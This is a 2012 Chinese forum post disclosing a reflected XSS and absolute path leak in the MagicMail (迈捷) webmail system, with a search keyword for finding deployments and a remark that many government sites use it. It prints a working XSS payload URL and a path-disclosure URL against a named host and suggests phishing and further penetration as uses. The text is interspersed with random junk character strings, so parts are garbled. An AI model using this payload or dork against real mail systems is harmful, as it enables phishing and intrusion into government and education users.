今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" _! d( i+ y0 d, B+ b! o# {6 `1 s# B6 D
6 r) \) M5 K2 u" n+ h2 ~; ?+ O
包含 一个反射性XSS 以及 绝对路径泄漏$ M+ Z( X9 U. M$ F5 \1 T
看了看 貌似全部是linux的。$ G! E. h3 C' r! a
( t2 H9 c D4 H- W$ u
关键字:迈捷邮件系统 by MagicMail* @: r7 B& C4 \( [
0 T+ P' f- X) _& ]可以看到很多政府网站都用这个邮件系统
x- z, R2 F8 \' G1 t9 N2 C. t F* @/ }+ @1 ^$ Z" N. ~' N
绝对路径 http://madman.in/index.php?login_type=declare&language=
]# c8 m& {- \$ n! l- i5 B" b& C, H3 X, Z, A1 O6 @2 i
2 B+ O% T V5 g) f5 C' N
8 Y, L2 [6 P$ |XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E" N* q% P9 O' l+ [
; N$ J' ^; _" M, B2 y; p( G
% a. s2 g7 |! {0 p- h
E" E+ w% O; L. P: ~$ v3 ~) r: \
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等3 g6 K& E" k ~" L
2 g9 c7 ^0 y# C+ J修复方案:看官方补丁吧。5 o" x9 y0 F7 b4 N S/ m( ?
|
发表于 2012-11-9 20:38:41
收藏
支持
反对